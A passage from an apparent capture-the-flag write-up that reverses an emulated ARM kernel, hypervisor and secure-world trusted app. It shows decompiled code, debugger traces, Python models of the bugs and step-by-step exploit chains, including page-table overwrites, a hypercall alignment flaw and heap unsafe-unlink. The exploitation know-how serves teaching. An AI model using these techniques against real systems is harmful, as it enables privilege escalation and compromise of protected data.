      prot = -1i64;
    }
    else
    {
      v21 = el1_allocate_el0_page(size);
      for ( j = v12; arg1 + v12 > j; j += 4096i64 )
        el1_change_el0_page_permissions(j, j + v21 - v12, prot);
      prot = v12;
    }
  }
}
</code></pre>
<p><code class="highlighter-rouge">write</code> also looks relatively straightforward.</p>
<pre><code class="language-cpp=">else if ( syscall_nr == 0x40 )
{
for ( i = 0i64; i < len; ++i )
el1_output_char(buffer[i]);
}
</code></pre>
<p>That leaves us with only <code class="highlighter-rouge">read</code>, which helps us out with a very useful bug.</p>
<pre><code class="language-cpp=">if ( syscall_nr == 0x3F ) // read
{
if ( arg2 )
{
ch = el1_read_char();
if ( ch & 0x80000000 )
{
arg2 = -1i64;
}
else
{
*(_BYTE *)outp = ch; // <---- [A]
arg2 = 1i64;
}
}
}
</code></pre>
<p>After reading in the character via <code class="highlighter-rouge">el1_read_char()</code>, the handler writes it back to the caller-specified memory address. The kernel is not enforcing PAN hardware protections, so it can write directly to userspace addresses. Astute readers will notice there’s no null check, nor any check that the address is actually mapped in userspace, meaning we can pass in any kernel address and write directly to it. This used to be a pretty common bug class and still pops up every now and then, <a href="https://www.synacktiv.com/posts/exploit/exploiting-a-no-name-freebsd-kernel-vulnerability.html">most recently seen in FreeBSD for example.</a></p>
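<p>To make the primitive concrete, here’s a toy Python model of the handler at [A] (the names and the bytearray standing in for kernel memory are mine): each syscall lands one attacker-chosen byte at an unvalidated address, so looping it gives a full write-what-where.</p>

```python
# Toy model of the bug at [A]: the read syscall stores one received byte
# through an unvalidated pointer. MEM stands in for kernel memory.
MEM = bytearray(0x100)

def sys_read(outp, ch):
    # models *(_BYTE *)outp = ch; -- no check that outp is a user address
    MEM[outp] = ch
    return 1

def arb_write(addr, data):
    # hypothetical exploit helper: loop the 1-byte primitive
    for i, b in enumerate(data):
        sys_read(addr + i, b)

arb_write(0x40, b"\x13\x37")
assert MEM[0x40:0x42] == b"\x13\x37"
```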
<p>The kernel has no ASLR to speak of, but the hypervisor is still enforcing NX. Writing to the stack could be a possibility; smashing our saved frame pointer could allow us to pivot a higher level call and achieve PC control, at which point we can ret2usr and run shellcode off an existing mapping.</p>
<p>I took a different approach however, since I didn’t think of that at the time. Instead, I decided to directly target EL1 translation table entries (TTEs) to replace a kernel page physaddr with that of my shellcode.</p>
<p><img src="/blog/assets/images/super-hexagon-tte.png" alt="tte diagram" /></p>
<p>Tracing through EL1 boot code, we find <code class="highlighter-rouge">el1_setup_user_mappings()</code>, which invokes <code class="highlighter-rouge">el1_change_el0_page_permissions()</code> to update TTE values whenever any page will be mapped. This occurs both when EL1 maps itself, as well as when EL1 loads the userspace ELF.</p>
<pre><code class="language-cpp=">void el1_change_page_permissions(uint64_t virtaddr, uint64_t physaddr, char prot)
{
uint64_t vaddr; // x22
int64_t v4; // x19
int64_t v5; // x20
int64_t v6; // x21
int64_t v7; // x0
vaddr = virtaddr;
if ( 0x400DC000 > physaddr || (v4 = physaddr, 0x400EB000 <= physaddr) )
{
el1_kprintf_0((__int64)"[KERNEL] Try to map illegal PA (user)\n");
el1_wfi_spinloop();
}
if ( prot & 2 )
{
v5 = 0x4C3i64;
v6 = 0x20000000000443i64;
}
else
{
v5 = 0x443i64;
v6 = 0x200000000004C3i64;
}
if ( !(prot & 4) )
{
v6 |= 0x40000000000000ui64;
v5 |= 0x40000000000000ui64;
}
v7 = el1_virt_to_phys(*(_QWORD *)((char *)&unk_C8BD7 + 0x15B9));
el1_update_page_table(0i64, v7, vaddr, v6 | v4);
el1_hypervisor_call(1i64, v4, v5, 0i64); // invoke vmm_mmap
__asm { SYS #0, c8, c7, #0 }
}
</code></pre>
<p>Notice that each translation table operation made also invokes a call to <code class="highlighter-rouge">vmm_mmap</code> in EL2 to validate the operation; this is the point at which our earlier attempt to map RWX triggered an abort(). The actual operation itself happens just before that hypercall, in <code class="highlighter-rouge">el1_update_page_table</code>.</p>
<pre><code class="language-cpp=">// translationtable is a qword array
translationtable[(virtaddr >> 12) & 0x1FF] = physaddr_with_flags;
</code></pre>
<p>We can examine these TTEs in a debugger to get an idea of their values, but the above function also maps <code class="highlighter-rouge">prot</code> values cleanly to the expected flags.</p>
<pre><code class="language-css=">gef> x/i $pc
=> 0xffffffffc000875c: str x3, [x1, x2, lsl #3]
// the base of our translation table
gef> x/4xg $x1
0xffffffffc0023000: 0x002000000002c4c3 0x002000000002d4c3
0xffffffffc0023010: 0x002000000002e4c3 0x0000000000000000
// the virtaddr to be updated
gef> p $x19
$15 = 0x412000
// the entry for this address, mapped RW
gef> stepi
gef> x/xg $x1 + ($x2 << 3)
0xffffffffc0023090: 0x006000000002f443
</code></pre>
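<p>As a sanity check, a few lines of Python modeling the flag selection from <code class="highlighter-rouge">el1_change_page_permissions</code> (my reading: <code class="highlighter-rouge">prot</code> bit 1 means writable, bit 2 executable) reproduce both the observed entry and its slot offset:</p>

```python
def el1_tte(phys, prot):
    # flag constants lifted from el1_change_page_permissions above
    flags = 0x20000000000443 if prot & 2 else 0x200000000004C3
    if not (prot & 4):
        flags |= 0x40000000000000  # execute-never
    return flags | phys

# the RW entry observed for virtaddr 0x412000 (physical page 0x2f000)
assert el1_tte(0x2F000, 0b010) == 0x006000000002F443
# its slot: index (va >> 12) & 0x1FF == 0x12, i.e. table base + 0x90
assert (0x412000 >> 12) & 0x1FF == 0x12
```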
<p>Abusing the <code class="highlighter-rouge">read</code> bug, we can read updated values directly into the TTE. But writing to the remapped page still faults! As it turns out, without the <code class="highlighter-rouge">el1_hypervisor_call</code> at the end of <code class="highlighter-rouge">el1_change_page_permissions</code>, the MMU state in EL2 won’t be updated to reflect the changes, and will fault on our write attempt. These memory flags in EL2 seem to be associated with the physical page address, so our writable mappings won’t work directly.</p>
<p>To avoid this, we can twiddle the bits on the TTE to point the existing page to our own, after we’ve already mapped it executable. Then, smashing a single byte in the stored return value on the stack should allow our syscall handler to return to our now-kernel-mapped shellcode page. The final flow of the exploit works as follows.</p>
<ol>
<li>Copy shellcode from the exploit script onto a RW mapping made with mmap</li>
<li>Update the mapping to be RX</li>
<li>Get its physical page number (deterministic across runs)</li>
<li>Write to EL1’s TTE for the virtual address associated with the base of the kernel. Make it point to our physical page</li>
<li>Smash a byte in the return address on the syscall handler stack. Again, this address will be deterministic. Execution returns to an offset in the first page of EL1, which now points to controlled data :)</li>
</ol>
<h3 id="el2-almost-bare-emulated-metal">EL2: (Almost) bare (emulated) metal</h3>
<p>Wow, kernel execution! Normally this would be great, but we’re only 2/6 of the way through. We’re now faced with targeting EL2, also known as the vmm or hypervisor. EL3 init tells us that EL2 starts at offset 0x10000, with a very small amount of code, mostly enabling MSRs and setting up UART for terminal r/w. The vmm itself is mapped beginning at physical address 0x40100000. Of note as always is the EL2 MMU setup, which gives us another clue to the boot log puzzle.</p>
<pre><code class="language-cpp=">void __cdecl el2_setup_mappings()
{
unsigned __int64 i;
__int64 v1;
__int64 v2;
unsigned __int64 j;
unsigned __int64 k;
__int64 v5;
__int64 v6;
el2_memset(el2_pte, 0, 0x1000i64);
el2_memset(vmm_translationtables, 0, 0x8000i64);
for ( i = 0i64; i <= 0x1FFFFF; i += 0x200000i64 )
el2_pte[(i >> 21) & 0x1FF] = (uint64_t)&vmm_translationtables[512 * ((i >> 21) & 0x1FF)] | 3;
el2_printf("[VMM] RO_IPA: %08x-%08x\n", v5, v6);
el2_printf("[VMM] RW_IPA: %08x-%08x\n", v1, v2);
for ( j = 0i64; j <= 0xBFFF; j += 0x1000i64 )
el2_mmap(j, 0x443i64);
for ( k = 0xC000i64; k <= 0x3BFFF; k += 0x1000i64 )
el2_mmap(k, 0x400000000004C3i64);
_WriteStatusReg(ARM64_SYSREG(3, 4, 2, 1, 0), (unsigned __int64)el2_pte); // VTTBR_EL2
_WriteStatusReg(ARM64_SYSREG(3, 4, 2, 1, 2), 0x80000027ui64); // VTCR_EL2
}
</code></pre>
<p>At boot, the printfs emitted were as follows</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000
</code></pre></div></div>
<p>Beginning at 0x40100000, it seems that EL2 reserves 0xC000 bytes for itself and then maps 0x30000 for EL1 and EL0. Those latter entries have the <code class="highlighter-rouge">PXN</code> bit set, so the vmm won’t execute off them directly.</p>
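<p>Assuming each stage-2 entry is built as <code class="highlighter-rouge">(0x40000000 + ipa) | flags</code> (which the <code class="highlighter-rouge">el2_mmap</code> disassembly below confirms), a quick Python sketch reproduces the banner’s two regions; note that flags <code class="highlighter-rouge">0x443</code> lack the writable bit <code class="highlighter-rouge">0x80</code> while <code class="highlighter-rouge">0x4C3</code> set it:</p>

```python
# Sketch of the tables el2_setup_mappings builds, one entry per 4K page.
def el2_entry(ipa, flags):
    return (0x40000000 + ipa) | flags

ro = [el2_entry(j, 0x443) for j in range(0, 0xC000, 0x1000)]
rw = [el2_entry(k, 0x400000000004C3) for k in range(0xC000, 0x3C000, 0x1000)]

assert len(ro) == 12 and not (ro[0] & 0x80)  # [VMM] RO_IPA: 00000000-0000c000
assert len(rw) == 48 and (rw[0] & 0x80)      # [VMM] RW_IPA: 0000c000-0003c000
```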
<p>The only exposed interface we’ve seen is the hypercall after the TTE update, so let’s take a look at the EL2 hypercall interface.</p>
<pre><code class="language-cpp=">_QWORD * el2_handle_hypercall(__int64 *args)
{
unsigned int v2;
signed __int64 arg0;
_QWORD *arg1;
__int64 arg3;
v2 = (unsigned int)_ReadStatusReg(ARM64_SYSREG(3, 4, 5, 2, 0)) >> 26;
arg0 = *args;
arg1 = (_QWORD *)args[1];
arg3 = args[3];
if ( v2 == 0x16 )
{
if ( arg0 == 1 )
arg1 = el2_mmap(arg1, args[2]);
else
arg0 = -1i64;
}
else
{
// ... ignore securecall passthrough for now ...
}
*args = arg0;
return arg1;
}
</code></pre>
<p>There’s only one hypercall, which is <code class="highlighter-rouge">el2_mmap</code>. Before even opening the function, we expect that any bug must somehow let us map an EL2 physical address as a writable mapping in EL1. We know from the EL1 call site that the two arguments passed are a physical address and TTE bits.</p>
<p>IDA has trouble with some of the spinloop functions that don’t return, so we’ll directly examine the assembly. In the interest of space I’ve trimmed it to the relevant sections and annotated it.</p>
<pre><code class="language-asm=">0x101E0 el2_mmap ; CODE XREF: el2_setup_mappings+A4↓p
0x101E0
0x101E0 LSR X2, X0, #0x15
0x101E4 UBFX X4, X0, #0xC, #9
0x101E8 CMP X0, #0x3B,LSL#12 ; Compare the first arg to 0x3b0000
0x101EC B.EQ loc_1024C
0x101F0 STP X29, X30, [SP,#var_10]!
0x101F4 MOV X29, SP
0x101F8 MOV X3, #0xBFFF
0x101FC MOVK X3, #3,LSL#16
0x10200 CMP X0, X3 ; Make sure the first argument is <= 0x3bffff
; otherwise, print "[VMM] Invalid IPA"
0x10204 B.HI loc_10294
0x10208 MOV X3, #0xBFFF
0x1020C CMP X0, X3
0x10210 B.HI loc_10218 ; Check if the argument is > 0xBFFF
; If so, skip this next instruction
0x10214 TBNZ W1, #7, loc_1026C ; Check the TTE flags for bit 7, indicating writable memory
; If so, reject with error:
; "[VMM] try to map writable pages in RO protected area"
0x10218 loc_10218 ; CODE XREF: el2_mmap+30↑j
0x10218 AND X3, X1, #0x7FFFFFFFFFFF80
0x1021C AND X3, X3, #0xFFC00000000000FF
0x10220 CMP X3, #0x80
0x10224 B.EQ loc_10280 ; 0x80 in the bitflags indicates RWX pages
; [VMM] RWX pages are not allowed
0x10228 MOV X3, #0x40000000
0x1022C ADD X0, X0, X3
0x10230 ORR X0, X0, X1
0x10234 ADD X2, X4, X2,LSL#9
0x10238 ADRP X1, #vmm_translationtable@PAGE
0x1023C ADD X1, X1, #vmm_translationtable@PAGEOFF
0x10240 STR X0, [X1,X2,LSL#3] ; All is well; insert the TTE
0x10244 LDP X29, X30, [SP+0x10+var_10],#0x10
0x10248 RET
</code></pre>
<p>The checks here are pretty robust. We can’t request writable memory in the EL2 code pages, nor can we pass in a too-large physical address. But there’s one oversight: physical addresses are not required by <code class="highlighter-rouge">el2_mmap()</code> to be aligned to 0x1000, and in fact they are never masked off before being written to the table.</p>
<p>The final value inserted into the translation table is <code class="highlighter-rouge">(0x40000000 + arg1) | arg2</code>, so the unmodified bottom bits of <code class="highlighter-rouge">arg1</code> influence the flags of the entry. Therefore, a call like <code class="highlighter-rouge">hypercall(VMM_mmap, 0x14c3, 0x10000)</code> yields the final TTE <code class="highlighter-rouge">0x400114C3</code>, a RW mapping of the EL2 code page <code class="highlighter-rouge">0x40011000</code>, which is inside the RO region! Exploitation is short and sweet, requiring only a single buggy hypercall. With some quick scripting, we can copy our shellcode onto our EL1 virtual address and find it dual-mapped as an EL2 page, yielding execution in hypervisor context.</p>
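<p>A back-of-the-envelope check of the primitive (entry construction per the assembly above; <code class="highlighter-rouge">0x80</code> is the writable attribute bit that the <code class="highlighter-rouge">TBNZ</code> guards, but only in the flags argument):</p>

```python
def el2_mmap_entry(ipa, flags):
    # the vulnerable construction: ipa's low 12 bits are never masked off
    return (0x40000000 + ipa) | flags

WRITABLE = 0x80  # the bit TBNZ W1, #7 checks -- in the flags arg only

entry = el2_mmap_entry(0x14C3, 0)    # flags pass the check (bit 7 clear)
assert entry & WRITABLE              # yet the entry comes out writable
assert (0x14C3 >> 12) & 0x1FF == 1   # and it lands in slot 1, the RO region
```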
<h3 id="securecalls-and-playing-telephone">Securecalls, and playing Telephone</h3>
<p>With the completion of EL2 we’ve conquered the entirety of normal world! But until this point we’ve ignored all calls to the secure world, which is where we’ll find the other 3 flags we’re still missing. As a brief description, ARM segregates execution space into normal and secure worlds, where the only communication between the two is brokered by the Secure Monitor (EL3). Secure world is intended for safeguarding personal data, like fingerprints, payment information, or passwords, and it presents an API accessible over “secure calls” made with the <code class="highlighter-rouge">smc</code> instruction. Secure world has similar exception levels to normal world, with an S-EL1 (“Trusted OS” or “TEE”) running “Trusted Apps” in the S-EL0 userspace. There’s currently no S-EL2 hypervisor equivalent, <a href="https://community.arm.com/developer/ip-products/processors/b/processors-ip-blog/posts/architecting-more-secure-world-with-isolation-and-virtualization">but it is coming in ARMv8.4</a>.</p>
<p><code class="highlighter-rouge">smc</code> is privileged and cannot be made directly by EL0, so in our case the EL0 makes a special syscall to flag its intention to EL1.</p>
<pre><code class="language-asm">0x0401B84 ; signed __int64 tc_register_wsm(void *a1, void *a2)
0x0401B84 EXPORT tc_register_wsm
0x0401B84 tc_register_wsm
0x0401B84 MOV X8, #3
0x0401B88 MOVK X8, #0xFF00,LSL#16 ; x8 becomes 0xFF000003LL
0x0401B8C SVC 0
0x0401B90 RET
0x0401B90 ; End of function tc_register_wsm
0x0401B90
</code></pre>
<p>EL1 performs some basic validation on the securecall arguments, then executes the <code class="highlighter-rouge">smc</code> instruction to generate a trap.</p>
<pre><code class="language-cpp=">void el1_securecall_passthrough(__int64 a1, __int64 arg1, unsigned __int64 arg2)
{
unsigned __int64 v4;
__int64 v5;
unsigned __int64 i;
signed __int64 v7;
v4 = arg2;
if ( a1 == 0xFF000005i64 )
{
if ( !(arg1 & 0xFFF) )
el1_make_smc(0x83000005i64, (unsigned int)arg1, (unsigned int)arg2, 0i64);
}
else if ( a1 == 0xFF000003i64 )
{
if ( !(arg2 & 0xFFF) && arg2 <= 0x4000 && !(arg1 & 0xFFF) ) // validate physical page
{
v5 = el1_get_page_physaddr(arg1); // make sure the first page is mapped
if ( (_DWORD)v5 != -1 )
{
for ( i = arg1 + 4096; arg1 + v4 > i; i += 4096i64 )
{
v7 = el1_get_page_physaddr(i);
if ( (_DWORD)v7 == -1 || i + v5 - arg1 != v7 ) // make sure subsequent pages are mapped
return;
}
el1_make_smc(0x83000003i64, v5, v4, 0i64); // invoke smc
}
}
}
else if ( a1 == 0xFF000006i64 && !(arg1 & 0xFFF) )
{
el1_make_smc(0x83000006i64, arg1, 0i64, 0i64);
}
}
</code></pre>
<p>EL2 receives the trap inside its handler, since we’re technically under virtualization, and again executes an <code class="highlighter-rouge">smc</code> after some validation.</p>
<pre><code class="language-cpp=29"> if ( arg0 == 0x83000003i64 )
{
if ( arg1 <= 0x3C000 )
arg0 = el2_make_smcall(0x83000003i64, arg1 + 0x8000000);
else
arg0 = -1i64;
}
else
{
arg0 = el2_make_smcall(arg0, arg1);
}
</code></pre>
<p>Finally, we reach our secure monitor code in EL3, which performs the actual crossing into secure world and sets up the arguments. But who finally receives the call?</p>
<h3 id="s-el0-a-whole-new-secure-world">S-EL0: A whole new (secure) world</h3>
<p>Stepping through EL3’s call to S-EL1/S-EL0 in a debugger quickly yields GDB errors. Luckily, after consulting the README and the included patch files, we notice that the organizers included a patch that changes QEMU’s debug server to report 32-bit ARM registers.</p>
<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">- cc->set_pc = aarch64_cpu_set_pc;
- cc->gdb_read_register = aarch64_cpu_gdb_read_register;
- cc->gdb_write_register = aarch64_cpu_gdb_write_register;
- cc->gdb_num_core_regs = 34;
- cc->gdb_core_xml_file = "aarch64-core.xml";
- cc->gdb_arch_name = aarch64_gdb_arch_name;
</span><span class="gi">+ cc->set_pc = arm_cpu_set_pc;
+ cc->gdb_read_register = arm_cpu_gdb_read_register;
+ cc->gdb_write_register = arm_cpu_gdb_write_register;
+ cc->gdb_num_core_regs = 26;
+ cc->gdb_core_xml_file = "arm-core.xml";
+ cc->gdb_arch_name = arm_gdb_arch_name;
</span></code></pre></div></div>
<p>It seems like the S-EL0 and S-EL1 implementations actually run 32-bit ARM, not aarch64! We can quickly verify this by pulling the qemu-3.0.0 source and building it with the provided patch. We now lose the ability to debug aarch64, but we can break and see ARM instructions in our secure world. To be precise, it is big-endian ARM, but executing mostly in thumb mode. At this point I chose to create a second idb for bios.bin to help with reversing, and rebased it to be appropriate for S-EL1.</p>
<p>Let’s begin by examining the trustlet blob passed to <code class="highlighter-rouge">tc_init_trustlet()</code> back in EL0. The code registered a blob of length 0x750, beginning with the string literal “HITCON\x00\x00”.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000: 4849 5443 4f4e 0000 6b12 0000 0010 0000 HITCON..k.......
00000010: 8406 0000 0020 0000 a800 0000 0000 1000 ..... ..........
00000020: 7010 0800 b0b5 8eb0 00af 7860 41f2 6c03 p.........x`A.l.
00000030: c0f2 1803 1b68 7b63 42f2 0003 c0f2 0003 .....h{cB.......
00000040: 07f1 0c04 1d46 0fcd 0fc4 0fcd 0fc4 2b68 .....F........+h
00000050: 2380 7b6b 3b63 3b6b 0122 1a60 3b6b 0c33 #.{k;c;k.".`;k.3
00000060: 07f1 0c02 1146 1846 00f0 f8fa 0020 00f0 .....F.F..... ..
00000070: 0ffb b0b5 90b0 00af 7860 7b68 5b68 fb63 ........x`{h[h.c
00000080: fb6b 092b 09d8 40f2 0002 c0f2 1002 fb6b .k.+..@........k
00000090: db00 1344 5b68 002b 1ad1 42f2 2403 c0f2 ...D[h.+..B.$...
</code></pre></div></div>
<p>The consistency of the first 0x20 bytes makes them look like a blob header, meaning this is probably a custom executable format. To understand it better, we’ll have to do some basic reversing of S-EL1.</p>
<p>According to EL3, S-EL1 is loaded at physical address 0xE400000 and from offset 0x20000 in <code class="highlighter-rouge">bios.bin</code>. It’s nonsensical in our aarch64 idb, but in our 32bit one we find a distinct interrupt table at that offset. Inside the reset handler we find the usual MSR twiddling and MMU setup. However, we’re instead interested in the function that handles secure calls, since that is the code responsible for <code class="highlighter-rouge">tci_init_trustlet()</code>. That handler occurs at 0x2087C, where we find 4 possible secure calls.</p>
<pre><code class="language-cpp=">void sel1_handle_securecall(int cmd, int arg0, int arg1)
{
int v0;
switch ( cmd )
{
case 0:
v0 = sel1_mmap_world_shared_memory(arg0, arg1);
sel1_return_val_to_normal_world(0x83000007, v0);
return;
case 1:
v0 = sel1_unmap_from_sel0(arg0, arg1);
sel1_return_val_to_normal_world(0x83000007, v0);
return;
case 2:
v0 = sel1_load_trusted_app(arg0, arg1);
sel1_return_val_to_normal_world(0x83000007, v0);
return;
case 3:
v0 = sel1_call_trusted_app(arg0);
sel1_return_val_to_normal_world(0x83000007, v0);
return;
default:
sel1_return_val_to_normal_world(0x83000007, -1);
return;
}
}
</code></pre>
<p>With the exception of <code class="highlighter-rouge">sel1_unmap_from_sel0</code>, we’ve seen these securecalls invoked from EL0. We can peek into <code class="highlighter-rouge">sel1_load_trusted_app</code> to better understand the binary format.</p>
<pre><code class="language-cpp=">signed int sel1_load_trusted_inner(_DWORD *trustlet, unsigned int length)
{
unsigned int v5;
unsigned int v6;
unsigned int len;
_BYTE *v8;
if ( !sel1_check_sha256(trustlet, length) ) // verify trustlet hash
return -1;
v8 = trustlet + trustlet[4] + 0x24; // get the data section
len = (((trustlet[4] - 1) >> 12) + 1) << 12;
if ( sel1_map_page_into_sel0(trustlet[3], len, 10) == -1 )
return -1;
v6 = (((trustlet[6] - 1) >> 12) + 1) << 12; // grab the bss length
if ( trustlet[6] )
{
if ( sel1_map_page_into_sel0(trustlet[5], v6, 14) == -1 )
return -1;
}
v5 = (((trustlet[8] - 1) >> 12) + 1) << 12;
if ( trustlet[8] )
{
if ( sel1_map_page_into_sel0(trustlet[7], v5, 14) == -1 )
return -1;
}
if ( sel1_map_page_into_sel0(0xFF8000u, 0x8000, 14) == -1 ) // map stack
return -1;
sel1_memset(trustlet[3], 0, len);
sel1_memcpy(trustlet[3], trustlet + 0x24, trustlet[4]);// copy in text section
if ( trustlet[6] )
{
sel1_memset(trustlet[5], 0, v6);
sel1_memcpy(trustlet[5], v8, trustlet[6]);
}
if ( trustlet[8] )
sel1_memset(trustlet[7], 0, v5);
sel1_memset(0xFF8000, 0, 0x8000); // set up stack
sel0_stored_retaddr = trustlet[2];
sel0_cmdbuf_addr = trustlet[8] + trustlet[7] - 4;
return 0;
}
</code></pre>
<p>After verifying the sha256 of the image against a hardcoded hash, it loads a text, data, and bss section from the buffer. No relocations, so ASLR is off. Armed with this information, we can load the file into IDA and lay out segments at fixed addresses to get an understanding of S-EL0.</p>
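<p>For instance, unpacking the header dwords from the dump above against <code class="highlighter-rouge">sel1_load_trusted_inner</code>’s indexing (the field names are my interpretation):</p>

```python
import struct

# First 0x24 bytes of the "HITCON" blob, transcribed from the hexdump.
hdr = bytes.fromhex(
    "484954434f4e0000"                # magic, trustlet[0..1]
    "6b120000" "00100000" "84060000"  # entry, text addr, text len
    "00200000" "a8000000"             # data addr, data len
    "00001000" "70100800"             # bss addr, bss len
)
entry, text_addr, text_len, data_addr, data_len, bss_addr, bss_len = \
    struct.unpack_from("<7I", hdr, 8)

assert hdr[:8] == b"HITCON\x00\x00"
assert entry & 1                            # thumb-mode entry point
assert 0x24 + text_len + data_len == 0x750  # matches the registered length
```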
<p>S-EL0 is a small binary composed of big-endian thumb code. In its command handler, it receives a pointer to a “tci” buffer, where the first dword is a command type. Only <code class="highlighter-rouge">load_key</code> and <code class="highlighter-rouge">save_key</code> are defined, but of interest is that <code class="highlighter-rouge">save_key</code> allocates buffers for the keys via a simple dlmalloc implementation. It invokes <code class="highlighter-rouge">malloc()</code> for a new key index, and if an existing key index is given to overwrite, it will first <code class="highlighter-rouge">free()</code> the value at that position.</p>
<p>The <code class="highlighter-rouge">save_key</code> and <code class="highlighter-rouge">load_key</code> functions operate on the handle passed by userspace, where that handle is actually the buffer’s S-EL0 virtual address. This means we can operate on any “buffer” by passing in an arbitrary “handle”.</p>
<p>This heap allocator uses the same chunk header as glibc malloc would use for a smallbin. Rather than multiple freelists based on chunk size, it puts all chunks into a single list comparable to glibc’s unsortedbin. It does support mmap’d chunks when the requested size is >0x40000. When freeing a non-mmap’d chunk, it will attempt consolidation with the previous and next chunks.</p>
<p>After spending some time auditing the heap implementation, I became interested in the mmap chunk code, since if we could get a writable mapping to the page the chunk was in, we’d be able to directly write to the chunk header. Here’s the relevant <code class="highlighter-rouge">mmap</code> syscall handler in S-EL1.</p>
<pre><code class="language-cpp=">_BYTE * sel1_mmap_syscall(__int16 req_virtaddr, int size)
{
int v4;
_BYTE *v5;
v4 = size;
if ( req_virtaddr & 0xFFF )
return -1;
if ( size & 0xFFF )
return -1;
if ( !size )
return -1;
v5 = sel1_find_contig_virtpage(size);
if ( v5 == -1 || sel1_map_page_into_sel0(v5, v4, 10) == -1 )
return -1;
sel1_memset(v5, 0, v4);
return v5;
}
</code></pre>
<p>The code attempts to find a contiguous set of virtual addresses to suit the mapping, then <code class="highlighter-rouge">sel1_map_page_into_sel0</code> will choose physical addresses and update the translation tables. Now, take a look at the <code class="highlighter-rouge">sel1_mmap_world_shared_memory</code> securecall handler we had access to via EL0.</p>
<pre><code class="language-cpp=">signed int sel1_mmap_world_shared_memory(unsigned int physaddr, int size)
{
signed int v2;
int v6;
if ( !size
|| size & 0xFFF
|| physaddr & 0xFFF
|| physaddr < 0x40000000
|| (v6 = sel1_find_contig_virtpage(size), v6 == -1)
|| sel1_map_page_tables(v6, physaddr, size, 2) == -1 )
{
v2 = -1;
}
else
{
v2 = v6;
}
return v2;
}
</code></pre>
<p>This code uses the same virtual address range! Finally, note the unused <code class="highlighter-rouge">munmap</code> syscall and securecall. With these primitives, we can abuse S-EL1’s mapping machinery to pwn S-EL0 in the following way.</p>
<ol>
<li>Make a mapping in S-EL0 of size 0x40000. We need a buffer this big in S-EL0 as a source for the memcpy() initializing our chunk.</li>
<li>Use the unmap securecall to unmap the first page of the mapping</li>
<li>Map in a single normal world physical page as world shared memory. This will land on our just-freed virtual address</li>
<li>Fill up the trusted app request to cause an mmap’d chunk of size 0x40000 to be created</li>
<li>Free the first page of that chunk with the unmap securecall</li>
<li>Map over it to fully control the chunk header</li>
</ol>
<p>Once we have control of the chunk header, we’ll twiddle the bits to convert it to a normal chunk, and then abuse heap consolidation’s unsafe-unlink to trigger a write to the saved return address in <code class="highlighter-rouge">sel0_free</code>. Everything in S-EL0 is mapped RWX, so we can just return directly to our shellcode buffer and gain S-EL0 execution.</p>
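<p>The resulting write primitive is the textbook unsafe unlink. A sketch with assumed 32-bit chunk offsets (<code class="highlighter-rouge">fd</code> at +8, <code class="highlighter-rouge">bk</code> at +12, and a dict standing in for memory; the addresses are illustrative):</p>

```python
MEM = {}

def unlink(chunk_fd, chunk_bk):
    # consolidation performs the two mirrored writes FD->bk = BK and
    # BK->fd = FD, with both pointers read from our faked chunk header
    MEM[chunk_fd + 12] = chunk_bk   # FD->bk = BK
    MEM[chunk_bk + 8] = chunk_fd    # BK->fd = FD

SAVED_LR = 0xFF7F00   # hypothetical saved-return-address slot on the stack
SHELLCODE = 0x2000    # our buffer in the RWX S-EL0 mapping

unlink(chunk_fd=SAVED_LR - 12, chunk_bk=SHELLCODE)
assert MEM[SAVED_LR] == SHELLCODE   # return address now points at shellcode
```

The mirrored write also clobbers <code class="highlighter-rouge">SHELLCODE + 8</code>, which is harmless as long as the shellcode jumps over those bytes.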
<p>As a final note, 32-bit ARM doesn’t have <code class="highlighter-rouge">mrs</code> access to these system registers the way aarch64 does, so we read the flag via the <code class="highlighter-rouge">mrc</code> coprocessor instruction.</p>
<pre><code class="language-arm">mrc p15,3,r1,c15,c12,0
str r1, [r0]
mrc p15,3,r1,c15,c12,1
str r1, [r0,#4]
mrc p15,3,r1,c15,c12,2
str r1, [r0,#8]
mrc p15,3,r1,c15,c12,3
str r1, [r0,#0xC]
mrc p15,3,r1,c15,c12,4
str r1, [r0,#0x10]
mrc p15,3,r1,c15,c12,5
str r1, [r0,#0x14]
mrc p15,3,r1,c15,c12,6
str r1, [r0,#0x18]
mrc p15,3,r1,c15,c12,7
str r1, [r0,#0x1c]
</code></pre>
<h3 id="s-el1-failing-upwards">S-EL1: Failing upwards</h3>
<p>To solve S-EL0 we performed some significant reversing on the syscall and securecall interfaces of S-EL1. When moving on to S-EL1, my first intuition was to examine the precise operation of the <code class="highlighter-rouge">munmap</code> and <code class="highlighter-rouge">mmap</code> handlers. These interested me because both secure and normal world pages could be mapped into the virtual address space. Both <code class="highlighter-rouge">mmap</code> and <code class="highlighter-rouge">map_world_shared_memory</code> store physical pages into the same table. However, the <code class="highlighter-rouge">munmap</code> syscall is identical to the securecall, and doesn’t special-case pages from different worlds. Thinking along those lines, the first bug I noticed was inside <code class="highlighter-rouge">map_world_shared_memory</code>. It rejects any <code class="highlighter-rouge">physaddr < 0x40000000</code>, preventing users from mapping pages below the VIRT_MEM region assigned by QEMU.</p>
<pre><code class="language-cpp=">while ( 1 )
{
if ( !len )
return 0;
if ( sel1_update_page_table(virtaddr, physaddr, prot) == -1 )
break;
virtaddr += 0x1000;
physaddr += 0x1000;
len -= 4096;
}
</code></pre>
<p>Later in the loop, however, there’s no check for integer overflow. A call like <code class="highlighter-rouge">map_wsm(0xFFFFF000, 0x2000)</code> results in a virtual address corresponding to the first page of EL3 becoming accessible to our S-EL0 shellcode. And in fact, that does happen! But there’s a catch: since those pages are mapped as VIRT_FLASH, QEMU allows reads but silently (!) drops writes to that address range without faulting. Confusingly, gdb can still write to those pages, likely because the QEMU gdbserver doesn’t distinguish between physical page types.</p>
<pre><code class="language-gdb">gef> x/i $pc
=> 0x237d318: str r3, [r1]
gef> x/xw $r1
0x237c80c: 0x91000042
gef> p $r3
$12 = 0x41414141
gef> stepi
gef> x/xw $r1
0x237c80c: 0x91000042
</code></pre>
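<p>The overflow itself is easy to demonstrate, assuming 32-bit physical address arithmetic in S-EL1 (the per-page loop from <code class="highlighter-rouge">sel1_mmap_world_shared_memory</code>, modeled in Python):</p>

```python
def mapped_pages(physaddr, size):
    # per-page loop from the shared-memory handler: the increment has no
    # overflow check, and on 32-bit ARM it silently wraps
    out = []
    while size:
        out.append(physaddr)
        physaddr = (physaddr + 0x1000) & 0xFFFFFFFF  # 32-bit wrap
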